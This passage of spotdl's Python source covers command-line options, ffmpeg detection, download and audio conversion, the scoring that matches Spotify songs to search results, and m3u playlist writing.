action="store_const", const=True, help="If a file with the extension .skip exists, skip download", ) # Sync remove lrc files parser.add_argument( "--sync-remove-lrc", action="store_const", const=True, help="Remove lrc files when using sync operation when downloading songs", ) def parse_web_options(parser: _ArgumentGroup): """ Parse web options from the command line. ### Arguments - parser: The argument parser to add the options to. """ # Add host argument parser.add_argument( "--host", type=str, help="The host to use for the web server.", ) # Add port argument parser.add_argument( "--port", type=int, help="The port to run the web server on.", ) # Add keep alive argument parser.add_argument( "--keep-alive", action="store_const", const=True, help="Keep the web server alive even when no clients are connected.", ) # Add allowed origins argument parser.add_argument( "--allowed-origins", nargs="*", help="The allowed origins for the web server.", ) # Add use output directory argument parser.add_argument( "--web-use-output-dir", action="store_const", const=True, help=( "Use the output directory instead of the session directory for downloads. (" "This might cause issues if you have multiple users using the web-ui at the same time)" ), ) # Add keep sessions argument parser.add_argument( "--keep-sessions", action="store_const", const=True, help="Keep the session directory after the web server is closed.", ) # Add keep sessions argument parser.add_argument( "--force-update-gui", action="store_const", const=True, default=False, help="Refresh the web server directory with a fresh git checkout", ) # Add custom web gui repo parser.add_argument( "--web-gui-repo", type=str, help=( "Custom web gui repo to use for the web server. " "Example: https://github.com/spotdl/web-ui/tree/master/dist" ), ) # Add custom web gui repo parser.add_argument( "--web-gui-location", type=str, help="Path to the web gui directory to use for the web server.", ) # Enable TLS for the web server parser.add_argument( "--enable-tls", action="store_const", const=True, help="Enable TLS on the web server.", ) # Add File Location of the TLS Certificate file (Pem Format) parser.add_argument( "--cert-file", type=str, help="File Path to the TLS Certificate (PEM format)." ) # Add File Location of the TLS Private Key file (Pem Format) parser.add_argument( "--key-file", type=str, help="File Path to the TLS Private Key (PEM format)." ) # Add File Location of the TLS Certificate Authority file (Pem Format) parser.add_argument( "--ca-file", type=str, help="File Path to the TLS Certificate Authority File (PEM format).", ) def parse_misc_options(parser: _ArgumentGroup): """ Parse misc options from the command line. ### Arguments - parser: The argument parser to add the options to. """ # Add verbose argument parser.add_argument( "--log-level", choices=NAME_TO_LEVEL.keys(), help="Select log level.", ) # Add simple tui argument parser.add_argument( "--simple-tui", action="store_const", const=True, help="Use a simple tui.", ) # Add log format argument parser.add_argument( "--log-format", help=( "Custom logging format to use. More info: " "https://docs.python.org/3/library/logging.html#logrecord-attributes" ), ) def parse_other_options(parser: _ArgumentGroup): """ Parse other options from the command line. ### Arguments - parser: The argument parser to add the options to. """ parser.add_argument( "--download-ffmpeg", action="store_true", help="Download ffmpeg to spotdl directory.", ) parser.add_argument( "--generate-config", action="store_true", help="Generate a config file. This will overwrite current config if present.", ) parser.add_argument( "--check-for-updates", action="store_true", help="Check for new version." ) parser.add_argument( "--profile", action="store_true", help="Run in profile mode. Useful for debugging.", ) parser.add_argument( "--version", "-v", action="version", help="Show the version number and exit.", version=_version.__version__, ) def create_parser() -> ArgumentParser: """ Parse arguments from the command line. ### Returns - A Namespace object containing the parsed arguments. """ # Initialize argument parser parser = ArgumentParser( prog="spotdl", description="Download your Spotify playlists and songs along with album art and metadata", formatter_class=SmartFormatter, epilog=( "For more information, visit http://spotdl.rtfd.io/ " "or join our Discord server: https://discord.com/invite/xCa23pwJWY" ), ) # Parse main options main_options = parser.add_argument_group("Main options") parse_main_options(main_options) # Parse spotify options spotify_options = parser.add_argument_group("Spotify options") parse_spotify_options(spotify_options) # Parse ffmpeg options ffmpeg_options = parser.add_argument_group("FFmpeg options") parse_ffmpeg_options(ffmpeg_options) # Parse output options output_options = parser.add_argument_group("Output options") parse_output_options(output_options) # Parse web options web_options = parser.add_argument_group("Web options") parse_web_options(web_options) # Parse misc options misc_options = parser.add_argument_group("Misc options") parse_misc_options(misc_options) # Parse other options other_options = parser.add_argument_group("Other options") parse_other_options(other_options) return parser def parse_arguments() -> Namespace: """ Parse arguments from the command line. ### Arguments - parser: The argument parser to parse the arguments from. ### Returns - A Namespace object containing the parsed arguments. """ # Create parser parser = create_parser() # Parse arguments return parser.parse_args() File: spotdl/utils/ffmpeg.py """ Module for converting audio files to different formats and checking for ffmpeg binary, and downloading it if not found. """ import os import platform import re import shlex import shutil import stat import subprocess from pathlib import Path from typing import Any, Callable, Dict, List, Optional, Tuple, Union import requests from spotdl.utils.config import get_spotdl_path from spotdl.utils.formatter import to_ms __all__ = [ "FFMPEG_URLS", "FFMPEG_FORMATS", "DUR_REGEX", "TIME_REGEX", "VERSION_REGEX", "YEAR_REGEX", "FFmpegError", "is_ffmpeg_installed", "get_ffmpeg_path", "get_ffmpeg_version", "get_local_ffmpeg", "download_ffmpeg", "convert", ] FFMPEG_URLS = { "windows": { "amd64": "https://github.com/eugeneware/ffmpeg-static/releases/download/b4.4/win32-x64", "i686": "https://github.com/eugeneware/ffmpeg-static/releases/download/b4.4/win32-ia32", }, "linux": { "x86_64": "https://github.com/eugeneware/ffmpeg-static/releases/download/b4.4/linux-x64", "x86": "https://github.com/eugeneware/ffmpeg-static/releases/download/b4.4/linux-ia32", "arm32": "https://github.com/eugeneware/ffmpeg-static/releases/download/b4.4/linux-arm", "aarch64": "https://github.com/eugeneware/ffmpeg-static/releases/download/b4.4/linux-arm64", }, "darwin": { "x86_64": "https://github.com/eugeneware/ffmpeg-static/releases/download/b4.4/darwin-x64", "arm64": "https://github.com/eugeneware/ffmpeg-static/releases/download/b4.4/darwin-arm64", }, } FFMPEG_FORMATS = { "mp3": ["-codec:a", "libmp3lame"], "flac": ["-codec:a", "flac", "-sample_fmt", "s16"], "ogg": ["-codec:a", "libvorbis"], "opus": ["-codec:a", "libopus"], "m4a": ["-codec:a", "aac"], "wav": ["-codec:a", "pcm_s16le"], } DUR_REGEX = re.compile( r"Duration: (?P<hour>\d{2}):(?P<min>\d{2}):(?P<sec>\d{2})\.(?P<ms>\d{2})" ) TIME_REGEX = re.compile( r"out_time=(?P<hour>\d{2}):(?P<min>\d{2}):(?P<sec>\d{2})\.(?P<ms>\d{2})" ) VERSION_REGEX = re.compile(r"ffmpeg version \w?(\d+\.)?(\d+)") YEAR_REGEX = re.compile(r"Copyright \(c\) \d\d\d\d\-\d\d\d\d") class FFmpegError(Exception): """ Base class for all exceptions related to FFmpeg. """ def is_ffmpeg_installed(ffmpeg: str = "ffmpeg") -> bool: """ Check if ffmpeg is installed. ### Arguments - ffmpeg: ffmpeg executable to check ### Returns - True if ffmpeg is installed, False otherwise. """ if ffmpeg == "ffmpeg": global_ffmpeg = shutil.which("ffmpeg") if global_ffmpeg is None: ffmpeg_path = get_ffmpeg_path() else: ffmpeg_path = Path(global_ffmpeg) else: ffmpeg_path = Path(ffmpeg) if ffmpeg_path is None: return False # else check if path to ffmpeg is valid # and if ffmpeg has the correct access rights return ffmpeg_path.exists() and os.access(ffmpeg_path, os.X_OK) def get_ffmpeg_path() -> Optional[Path]: """ Get path to global ffmpeg binary or a local ffmpeg binary. ### Returns - Path to ffmpeg binary or None if not found. """ # Check if ffmpeg is installed global_ffmpeg = shutil.which("ffmpeg") if global_ffmpeg: return Path(global_ffmpeg) # Get local ffmpeg path return get_local_ffmpeg() def get_ffmpeg_version(ffmpeg: str = "ffmpeg") -> Tuple[Optional[float], Optional[int]]: """ Get ffmpeg version. ### Arguments - ffmpeg: ffmpeg executable to check ### Returns - Tuple of optional version and optional year. ### Errors - FFmpegError if ffmpeg is not installed. - FFmpegError if ffmpeg version is not found. """ # Check if ffmpeg is installed if not is_ffmpeg_installed(ffmpeg): if ffmpeg == "ffmpeg": raise FFmpegError("ffmpeg is not installed.") raise FFmpegError(f"{ffmpeg} is not a valid ffmpeg executable.") with subprocess.Popen( [ffmpeg, "-version"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding="utf-8", ) as process: output = "".join(process.communicate()) # Search for version and build year in output version_result = VERSION_REGEX.search(output) year_result = YEAR_REGEX.search(output) build_year = None version = None if version_result is not None: # remove all non numeric characters from string example: n4.3 version_str = re.sub(r"[a-zA-Z]", "", version_result.group(0)) # parse version string to float version = float(version_str) if version_str else None if year_result is not None: # get build years from string example: Copyright (c) 2019-2020 build_years = [ int( re.sub(r"[^0-9]", "", year) ) # remove all non numeric characters from string for year in year_result.group(0).split( "-" ) # split string into list of years ] # get the highest build year build_year = max(build_years) return (version, build_year) def get_local_ffmpeg() -> Optional[Path]: """ Get local ffmpeg binary path. ### Returns - Path to ffmpeg binary or None if not found. """ ffmpeg_path = Path(get_spotdl_path()) / ( "ffmpeg" + (".exe" if platform.system() == "Windows" else "") ) if ffmpeg_path.is_file(): return ffmpeg_path return None def download_ffmpeg() -> Path: """ Download ffmpeg binary to spotdl directory. ### Returns - Path to ffmpeg binary. ### Notes - ffmpeg is downloaded from github releases for current platform and architecture. - executable permission is set for ffmpeg binary. """ os_name = platform.system().lower() os_arch = platform.machine().lower() ffmpeg_url: Optional[str] = None # if platform.system() == "Darwin" and ( # platform.processor() == "arm" # or subprocess.run(["sysctl", "-n", "sysctl.proc_translated"], check=False) # ): # ffmpeg_url = FFMPEG_URLS["darwin"]["arm"] # else: # ffmpeg_url = FFMPEG_URLS.get(os_name, {}).get(os_arch) ffmpeg_url = FFMPEG_URLS.get(os_name, {}).get(os_arch) if ffmpeg_url is None: raise FFmpegError("FFmpeg binary is not available for your system.") ffmpeg_path = Path( os.path.join( get_spotdl_path(), "ffmpeg" + (".exe" if os_name == "windows" else "") ) ) # Download binary and save it to a file in spotdl directory ffmpeg_binary = requests.get(ffmpeg_url, allow_redirects=True, timeout=10).content with open(ffmpeg_path, "wb") as ffmpeg_file: ffmpeg_file.write(ffmpeg_binary) # Set executable permission on linux and mac if os_name in ["linux", "darwin"]: ffmpeg_path.chmod(ffmpeg_path.stat().st_mode | stat.S_IEXEC) return ffmpeg_path def convert( input_file: Union[Path, Tuple[str, str]], output_file: Path, ffmpeg: str = "ffmpeg", output_format: str = "mp3", bitrate: Optional[str] = None, ffmpeg_args: Optional[str] = None, progress_handler: Optional[Callable[[int], None]] = None, ) -> Tuple[bool, Optional[Dict[str, Any]]]: """ Convert the input file to the output file synchronously with progress handler. ### Arguments - input_file: Path to input file or tuple of (url, file_format). - output_file: Path to output file. - ffmpeg: ffmpeg executable to use. - output_format: output format. - bitrate: constant/variable bitrate. - ffmpeg_args: ffmpeg arguments. - progress_handler: progress handler, has to accept an integer as argument. ### Returns - Tuple of conversion status and error dictionary. ### Notes - Make sure to check if ffmpeg is installed before calling this function. """ # Initialize ffmpeg command # -i is the input file arguments: List[str] = [ "-nostdin", "-y", "-i", str(input_file.resolve()) if isinstance(input_file, Path) else input_file[0], "-movflags", "+faststart", "-v", "debug", "-progress", "-", "-nostats", ] file_format = ( str(input_file.suffix).split(".")[1] if isinstance(input_file, Path) else input_file[1] ) # Add output format to command # -c:a is used if the file is not an matroska container # and we want to convert to opus # otherwise we use arguments from FFMPEG_FORMATS if output_format == "opus" and file_format != "webm": arguments.extend(["-c:a", "libopus"]) else: if ( (output_format == "opus" and file_format == "webm") or (output_format == "m4a" and file_format == "m4a") and not (bitrate or ffmpeg_args) ): # Copy the audio stream to the output file arguments.extend(["-vn", "-c:a", "copy"]) else: arguments.extend(FFMPEG_FORMATS[output_format]) # Add bitrate if specified if bitrate: # Check if bitrate is an integer # if it is then use it as variable bitrate if bitrate.isdigit(): arguments.extend(["-q:a", bitrate]) else: arguments.extend(["-b:a", bitrate]) # Add other ffmpeg arguments if specified if ffmpeg_args: arguments.extend(shlex.split(ffmpeg_args)) # Add output file at the end arguments.append(str(output_file.resolve())) # Run ffmpeg with subprocess.Popen( [ffmpeg, *arguments], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=False, ) as process: if not progress_handler: # Wait for process to finish proc_out = process.communicate() if process.returncode != 0: # get version and build year version = get_ffmpeg_version(ffmpeg) # join stdout and stderr and decode to utf-8 message = b"".join([out for out in proc_out if out]).decode("utf-8") # return error dictionary return False, { "return_code": process.returncode, "arguments": arguments, "ffmpeg": ffmpeg, "version": version[0], "build_year": version[1], "error": message, } return True, None progress_handler(0) out_buffer = [] total_dur = None while True: if process.stdout is None: continue out_line = ( process.stdout.readline().decode("utf-8", errors="replace").strip() ) if out_line == "" and process.poll() is not None: break out_buffer.append(out_line.strip()) total_dur_match = DUR_REGEX.search(out_line) if total_dur is None and total_dur_match: total_dur = to_ms(**total_dur_match.groupdict()) # type: ignore continue if total_dur: progress_time = TIME_REGEX.search(out_line) if progress_time: elapsed_time = to_ms(**progress_time.groupdict()) # type: ignore progress_handler(int(elapsed_time / total_dur * 100)) # type: ignore if process.returncode != 0: # get version and build year version = get_ffmpeg_version(ffmpeg) return False, { "return_code": process.returncode, "arguments": arguments, "ffmpeg": ffmpeg, "version": version[0], "build_year": version[1], "error": "\n".join(out_buffer), } progress_handler(100) return True, None File: spotdl/utils/__init__.py """ Utility functions for spotdl. These functions are used in every stage of the download process. """ File: spotdl/utils/matching.py """ Module for all things matching related """ import logging from itertools import product, zip_longest from math import exp from typing import Dict, List, Optional, Tuple from spotdl.types.result import Result from spotdl.types.song import Song from spotdl.utils.formatter import ( create_search_query, create_song_title, ratio, slugify, ) from spotdl.utils.logging import MATCH __all__ = [ "FORBIDDEN_WORDS", "fill_string", "create_clean_string", "sort_string", "based_sort", "check_common_word", "check_forbidden_words", "create_match_strings", "get_best_matches", "calc_main_artist_match", "calc_artists_match", "artists_match_fixup1", "artists_match_fixup2", "artists_match_fixup3", "calc_name_match", "calc_time_match", "calc_album_match", ] logger = logging.getLogger(__name__) FORBIDDEN_WORDS = [ "bassboosted", "remix", "remastered", "remaster", "reverb", "bassboost", "live", "acoustic", "8daudio", "concert", "live", "acapella", "slowed", "instrumental", "remix", "cover", "reverb", ] def debug(song_id: str, result_id: str, message: str) -> None: """ Log a message with MATCH level ### Arguments - message: message to log """ logger.log(MATCH, "[%s|%s] %s", song_id, result_id, message) def fill_string(strings: List[str], main_string: str, string_to_check: str) -> str: """ Create a string with strings from `strings` list if they are not yet present in main_string but are present in string_to_check ### Arguments - strings: strings to check - main_string: string to add strings to - string_to_check: string to check if strings are present in ### Returns - string with strings from `strings` list """ final_str = main_string test_str = final_str.replace("-", "") simple_test_str = string_to_check.replace("-", "") for string in strings: slug_str = slugify(string).replace("-", "") if slug_str in simple_test_str and slug_str not in test_str: final_str += f"-{slug_str}" test_str += slug_str return final_str def create_clean_string( words: List[str], string: str, sort: bool = False, join_str: str = "-" ) -> str: """ Create a string with strings from `words` list if they are not yet present in `string` ### Arguments - words: strings to check - string: string to check if strings are present in - sort: sort strings in list - join_str: string to join strings with ### Returns - string with strings from `words` list """ string = slugify(string).replace("-", "") final = [] for word in words: word = slugify(word).replace("-", "") if word in string: continue final.append(word) if sort: return sort_string(final, join_str) return f"{join_str}".join(final) def sort_string(strings: List[str], join_str: str) -> str: """ Sort strings in list and join them with `join` string ### Arguments - strings: strings to sort - join: string to join strings with ### Returns - joined sorted string """ final_str = strings final_str.sort() return f"{join_str}".join(final_str) def based_sort(strings: List[str], based_on: List[str]) -> Tuple[List[str], List[str]]: """ Sort strings in list based on the order of strings in `based_on` list ### Arguments - strings: strings to sort - based_on: strings to sort `strings` list based on ### Returns - sorted list of strings """ strings.sort() based_on.sort() list_map = {value: index for index, value in enumerate(based_on)} strings = sorted( strings, key=lambda x: list_map.get(x, -1), reverse=True, ) based_on.reverse() return strings, based_on def check_common_word(song: Song, result: Result) -> bool: """ Check if a word is present in a sentence ### Arguments - song: song to match - result: result to match ### Returns - True if word is present in sentence, False otherwise """ sentence_words = slugify(song.name).split("-") to_check = slugify(result.name).replace("-", "") for word in sentence_words: if word != "" and word in to_check: return True return False def check_forbidden_words(song: Song, result: Result) -> Tuple[bool, List[str]]: """ Check if a forbidden word is present in the result name ### Arguments - song: song to match - result: result to match ### Returns - True if forbidden word is present in result name, False otherwise """ song_name = slugify(song.name).replace("-", "") to_check = slugify(result.name).replace("-", "") words = [] for word in FORBIDDEN_WORDS: if word in to_check and word not in song_name: words.append(word) return len(words) > 0, words def create_match_strings( song: Song, result: Result, search_query: Optional[str] = None ) -> Tuple[str, str]: """ Create strings based on song and result to match fill strings with missing artists ### Arguments - song: song to match - result: result to match ### Returns - tuple of strings to match """ slug_song_name = slugify(song.name) slug_song_title = slugify( create_song_title(song.name, song.artists) if not search_query else create_search_query(song, search_query, False, None, True) ) test_str1 = slugify(result.name) test_str2 = slug_song_name if result.verified else slug_song_title # Fill strings with missing artists test_str1 = fill_string(song.artists, test_str1, test_str2) test_str2 = fill_string(song.artists, test_str2, test_str1) # Sort both strings and then join them test_list1, test_list2 = based_sort(test_str1.split("-"), test_str2.split("-")) test_str1, test_str2 = "-".join(test_list1), "-".join(test_list2) return test_str1, test_str2 def get_best_matches( results: Dict[Result, float], score_threshold: float ) -> List[Tuple[Result, float]]: """ Get best matches from a list of results ### Arguments - results: list of results to match - score_threshold: threshold to match results ### Returns - list of best matches """ result_items = list(results.items()) # Sort results by highest score sorted_results = sorted(result_items, key=lambda x: x[1], reverse=True) best_score = sorted_results[0][1] return [ result for result in sorted_results if (best_score - result[1]) <= score_threshold ] def calc_main_artist_match(song: Song, result: Result) -> float: """ Check if main artist is present in list of artists ### Arguments - main_artist: main artist to check - artists: list of artists to check ### Returns - True if main artist is present in list of artists, False otherwise """ main_artist_match = 0.0 # Result has no artists, return 0.0 if not result.artists: return main_artist_match song_artists, result_artists = list(map(slugify, song.artists)), list( map(slugify, result.artists) ) sorted_song_artists, sorted_result_artists = based_sort( song_artists, result_artists ) debug(song.song_id, result.result_id, f"Song artists: {sorted_song_artists}") debug(song.song_id, result.result_id, f"Result artists: {sorted_result_artists}") slug_song_main_artist = slugify(song.artists[0]) slug_result_main_artist = sorted_result_artists[0] # Result has only one artist, but song has multiple artists # we can assume that other artists are in the main artist name if len(song.artists) > 1 and len(result.artists) == 1: for artist in map(slugify, song.artists[1:]): artist = sort_string(slugify(artist).split("-"), "-") res_main_artist = sort_string(slug_result_main_artist.split("-"), "-") if artist in res_main_artist: main_artist_match += 100 / len(song.artists) return main_artist_match # Match main result artist with main song artist main_artist_match = ratio(slug_song_main_artist, slug_result_main_artist) debug( song.song_id, result.result_id, f"First main artist match: {main_artist_match}" ) # Use second artist from the sorted list to # calculate the match if the first artist match is too low if main_artist_match < 50 and len(song_artists) > 1: for song_artist, result_artist in product( song_artists[:2], sorted_result_artists[:2] ): new_artist_match = ratio(song_artist, result_artist) debug( song.song_id, result.result_id, f"Matched {song_artist} with {result_artist}: {new_artist_match}", ) main_artist_match = max(main_artist_match, new_artist_match) return main_artist_match def calc_artists_match(song: Song, result: Result) -> float: """ Check if all artists are present in list of artists ### Arguments - song: song to match - result: result to match ### Returns - artists match percentage """ artist_match_number = 0.0 # Result has only one artist, return 0.0 if len(song.artists) == 1 or not result.artists: return artist_match_number artist1_list, artist2_list = based_sort( list(map(slugify, song.artists)), list(map(slugify, result.artists)) ) # Remove main artist from the lists artist1_list, artist2_list = artist1_list[1:], artist2_list[1:] artists_match = 0.0 for artist1, artist2 in zip_longest(artist1_list, artist2_list): artist12_match = ratio(artist1, artist2) artists_match += artist12_match artist_match_number = artists_match / len(artist1_list) return artist_match_number def artists_match_fixup1(song: Song, result: Result, score: float) -> float: """ Multiple fixes to the artists score for not verified results to improve the accuracy ### Arguments - song: song to match - result: result to match - score: current score ### Returns - new score """ # If we have a verified result, we don't have to fix anything if result.verified or score > 50: return score # If we didn't find any artist match, # we fallback to channel name match channel_name_match = ratio( slugify(song.artist), slugify(", ".join(result.artists)) if result.artists else "", ) score = max(score, channel_name_match) # If artist match is still too low, # we fallback to matching all song artist names # with the result's title if score <= 70: artist_title_match = 0.0 result_name = slugify(result.name).replace("-", "") for artist in song.artists: slug_artist = slugify(artist).replace("-", "") if slug_artist in result_name: artist_title_match += 1.0 artist_title_match = (artist_title_match / len(song.artists)) * 100 score = max(score, artist_title_match) # If artist match is still too low, # we fallback to matching all song artist names # with the result's artists if score <= 70: # Song artists: ['charlie-moncler', 'fukaj', 'mata', 'pedro'] # Result artists: ['fukaj-mata-charlie-moncler-und-pedro'] # For artist_list1 artist_list1 = [] for artist in song.artists: artist_list1.extend(slugify(artist).split("-")) # For artist_list2 artist_list2 = [] if result.artists: for artist in result.artists: artist_list2.extend(slugify(artist).split("-")) artist_tuple1 = tuple(artist_list1) artist_tuple2 = tuple(artist_list2) artist_title_match = ratio(artist_tuple1, artist_tuple2) score = max(score, artist_title_match) return score def artists_match_fixup2( song: Song, result: Result, score: float, search_query: Optional[str] = None ) -> float: """ Multiple fixes to the artists score for verified results to improve the accuracy ### Arguments - song: song to match - result: result to match - score: current score ### Returns - new score """ if score > 70 or not result.verified: # Don't fixup the score # if the artist match is already high # or if the result is not verified return score # Slugify some variables slug_song_name = slugify(song.name) slug_result_name = slugify(result.name) # # Check if the main artist is simlar has_main_artist = (score / (2 if len(song.artists) > 1 else 1)) > 50 _, match_str2 = create_match_strings(song, result, search_query) # Check if other song artists are in the result name # if they are, we increase the artist match # (main artist is already checked, so we skip it) artists_to_check = song.artists[int(has_main_artist) :] for artist in artists_to_check: artist = slugify(artist).replace("-", "") if artist in match_str2.replace("-", ""): score += 5 # if the artist match is still too low, # we fallback to matching all song artist names # with the result's artists if score <= 70: # Artists from song/result name without the song/result name words artist_list1 = create_clean_string(song.artists, slug_song_name, True) artist_list2 = create_clean_string( list(result.artists) if result.artists else [result.author], slug_result_name, True, ) artist_title_match = ratio(artist_list1, artist_list2) score = max(score, artist_title_match) return score def artists_match_fixup3(song: Song, result: Result, score: float) -> float: """ Calculate match percentage based result's name and song's title if the result has exactly one artist and the song has more than one artist ### Arguments - song: song to match - result: result to match - score: current score ### Returns - new score """ if ( score > 70 or not result.artists or len(result.artists) > 1 or len(song.artists) == 1 ): # Don't fixup the score # if the score is already high # or if the result has more than one artist # or if the song has only one artist return score artists_score_fixup = ratio( slugify(result.name), slugify(create_song_title(song.name, [song.artist])), ) if artists_score_fixup >= 80: score = (score + artists_score_fixup) / 2 # Make sure that the score is not higher than 100 score = min(score, 100) return score def calc_name_match( song: Song, result: Result, search_query: Optional[str] = None ) -> float: """ Calculate name match percentage ### Arguments - song: song to match - result: result to match ### Returns - name match percentage """ # Create match strings that will be used # to calculate name match value match_str1, match_str2 = create_match_strings(song, result, search_query) result_name, song_name = slugify(result.name), slugify(song.name) res_list, song_list = based_sort(result_name.split("-"), song_name.split("-")) result_name, song_name = "-".join(res_list), "-".join(song_list) # Calculate initial name match name_match = ratio(result_name, song_name) debug(song.song_id, result.result_id, f"MATCH STRINGS: {match_str1} - {match_str2}") debug( song.song_id, result.result_id, f"SLUG MATCH STRINGS: {song_name} - {result_name}", ) debug(song.song_id, result.result_id, f"First name match: {name_match}") # If name match is lower than 60%, # we try to match using the test strings if name_match <= 75: second_name_match = ratio( match_str1, match_str2, ) debug( song.song_id, result.result_id, f"Second name match: {second_name_match}", ) name_match = max(name_match, second_name_match) return name_match def calc_time_match(song: Song, result: Result) -> float: """ Calculate time difference between song and result ### Arguments - song: song to match - result: result to match ### Returns - time difference between song and result """ time_diff = abs(song.duration - result.duration) score = exp(-0.1 * time_diff) return score * 100 def calc_album_match(song: Song, result: Result) -> float: """ Calculate album match percentage ### Arguments - song: song to match - result: result to match ### Returns - album match percentage """ if not result.album: return 0.0 return ratio(slugify(song.album_name), slugify(result.album)) def order_results( results: List[Result], song: Song, search_query: Optional[str] = None, ) -> Dict[Result, float]: """ Order results. ### Arguments - results: The results to order. - song: The song to order for. - search_query: The search query. ### Returns - The ordered results. """ # Assign an overall avg match value to each result links_with_match_value = {} # Iterate over all results for result in results: debug( song.song_id, result.result_id, f"Calculating match value for {result.url} - {result.json}", ) # skip results that have no common words in their name if not check_common_word(song, result): debug( song.song_id, result.result_id, "Skipping result due to no common words" ) continue # Calculate match value for main artist artists_match = calc_main_artist_match(song, result) debug(song.song_id, result.result_id, f"Main artist match: {artists_match}") # Calculate match value for all artists other_artists_match = calc_artists_match(song, result) debug( song.song_id, result.result_id, f"Other artists match: {other_artists_match}", ) artists_match += other_artists_match # Calculate initial artist match value debug(song.song_id, result.result_id, f"Initial artists match: {artists_match}") artists_match = artists_match / (2 if len(song.artists) > 1 else 1) debug(song.song_id, result.result_id, f"First artists match: {artists_match}") # First attempt to fix artist match artists_match = artists_match_fixup1(song, result, artists_match) debug( song.song_id, result.result_id, f"Artists match after fixup1: {artists_match}", ) # Second attempt to fix artist match artists_match = artists_match_fixup2(song, result, artists_match) debug( song.song_id, result.result_id, f"Artists match after fixup2: {artists_match}", ) # Third attempt to fix artist match artists_match = artists_match_fixup3(song, result, artists_match) debug( song.song_id, result.result_id, f"Artists match after fixup3: {artists_match}", ) debug(song.song_id, result.result_id, f"Final artists match: {artists_match}") # Calculate name match name_match = calc_name_match(song, result, search_query) debug(song.song_id, result.result_id, f"Initial name match: {name_match}") # Check if result contains forbidden words contains_fwords, found_fwords = check_forbidden_words(song, result) if contains_fwords: for _ in found_fwords: name_match -= 15 debug( song.song_id, result.result_id, f"Contains forbidden words: {contains_fwords}, {found_fwords}", ) debug(song.song_id, result.result_id, f"Final name match: {name_match}") # Calculate album match album_match = calc_album_match(song, result) debug(song.song_id, result.result_id, f"Final album match: {album_match}") # Calculate time match time_match = calc_time_match(song, result) debug(song.song_id, result.result_id, f"Final time match: {time_match}") # Ignore results with name match lower than 60% if name_match <= 60: debug( song.song_id, result.result_id, "Skipping result due to name match lower than 60%", ) continue # Ignore results with artists match lower than 70% if artists_match < 70 and result.source != "slider.kz": debug( song.song_id, result.result_id, "Skipping result due to artists match lower than 70%", ) continue # Calculate total match average_match = (artists_match + name_match) / 2 debug(song.song_id, result.result_id, f"Average match: {average_match}") if ( result.verified and not result.isrc_search and result.album and album_match <= 80 ): # we are almost certain that this is the correct result # so we add the album match to the average match average_match = (average_match + album_match) / 2 debug( song.song_id, result.result_id, f"Average match /w album match: {average_match}", ) # Skip results with time match lower than 25% if time_match < 25: debug( song.song_id, result.result_id, "Skipping result due to time match lower than 25%", ) continue # If the time match is lower than 50% # and the average match is lower than 75% # we skip the result if time_match < 50 and average_match < 75: debug( song.song_id, result.result_id, "Skipping result due to time match < 50% and average match < 75%", ) continue if ( (not result.isrc_search and average_match <= 85) or result.source == "slider.kz" or time_match < 0 ): # Don't add time to avg match if average match is not the best # (lower than 85%), always include time match if result is from # slider.kz or if time match is lower than 0 average_match = (average_match + time_match) / 2 debug( song.song_id, result.result_id, f"Average match /w time match: {average_match}", ) if (result.explicit is not None and song.explicit is not None) and ( result.explicit != song.explicit ): debug( song.song_id, result.result_id, "Lowering average match due to explicit mismatch", ) average_match -= 5 average_match = min(average_match, 100) debug(song.song_id, result.result_id, f"Final average match: {average_match}") # the results along with the avg Match links_with_match_value[result] = average_match return links_with_match_value File: spotdl/utils/m3u.py """ Module for creating m3u content and writing it to a file. """ from pathlib import Path from typing import Dict, List, Optional from spotdl.types.song import Song from spotdl.utils.formatter import create_file_name, sanitize_string __all__ = [ "create_m3u_content", "gen_m3u_files", "create_m3u_file", ] def create_m3u_content( song_list: List[Song], template: str, file_extension: str, restrict: Optional[str] = None, short: bool = False, detect_formats: Optional[List[str]] = None, ) -> str: """ Create m3u content and return it as a string. ### Arguments - song_list: the list of songs - template: the template to use - file_extension: the file extension to use - restrict: sanitization to apply to the filename - short: whether to use the short version of the template ### Returns - the m3u content as a string """ text = "" for song in song_list: if not detect_formats: file_name = create_file_name( song, template, file_extension, restrict, short ) text += str(file_name) + "\n" else: for file_ext in detect_formats: file_name = create_file_name(song, template, file_ext, restrict, short) if file_name.exists(): text += str(file_name) + "\n" break else: file_name = create_file_name( song, template, file_extension, restrict, short ) text += str(file_name) + "\n" return text def gen_m3u_files( songs: List[Song], file_name: Optional[str], template: str, file_extension: str, restrict: Optional[str] = None, short: bool = False, detect_formats: Optional[List[str]] = None, ): """ Create an m3u8 filename from the query. ### Arguments - query: the query - file_name: the file name to use - song_list: the list of songs - template: the output file template to use - file_extension: the file extension to use - restrict: sanitization to apply to the filename - short: whether to use the short version of the template - detect_formats: the formats to detect """ # If no file name is provided, use the first list's name if not file_name: file_name = "{list[0]}.m3u8" # If file_name ends with a slash. Does not have a m3u8 name with extension # at the end of the template, append `{list[0]}`` to it if ( file_name.endswith("/") or file_name.endswith(r"\\") or file_name.endswith("\\\\") ): file_name += "/{list[0]}.m3u8" # Check if the file name ends with .m3u or .m3u8 if not file_name.endswith(".m3u") and not file_name.endswith(".m3u8"): file_name += ".m3u8" lists_object: Dict[str, List[Song]] = {} for song in songs: if song.list_name is None: continue if song.list_name not in lists_object: lists_object[song.list_name] = [] lists_object[song.list_name].append(song) if "{list}" in file_name: # Create multiple m3u files if there are multiple lists for list_name, song_list in lists_object.items(): create_m3u_file( file_name.format( list=list_name, ), song_list, template, file_extension, restrict, short, detect_formats, ) elif "{list[" in file_name and "]}" in file_name: # Create a single m3u file for specified song list name create_m3u_file( file_name.format(list=list(lists_object.keys())), songs, template, file_extension, restrict, short, detect_formats, ) else: # Use the provided file name create_m3u_file( file_name, songs, template, file_extension, restrict, short, detect_formats, ) def create_m3u_file( file_name: str, song_list: List[Song], template: str, file_extension: str, restrict: Optional[str] = None, short: bool = False, detect_formats: Optional[List[str]] = None, ) -> str: """ Create the m3u file. ### Arguments - file_name: the file name to use - song_list: the list of songs - template: the template to use - file_extension: the file extension to use - restrict: sanitization to apply to the filename - short: whether to use the short version of the template - detect_formats: the formats to detect ### Returns - the m3u content as a string """ m3u_content = create_m3u_content( song_list, template, file_extension, restrict, short, detect_formats, ) file_path = Path(sanitize_string(file_name)).absolute() with open(file_path, "w", encoding="utf-8") as m3u_file: m3u_file.write(m3u_content) return m3u_content File: spotdl/utils/static.py """ Module for holding static variables that are used throughout the project. And are for the most part, not likely to change. (Also holds really large variables, so pylint is disabled here) 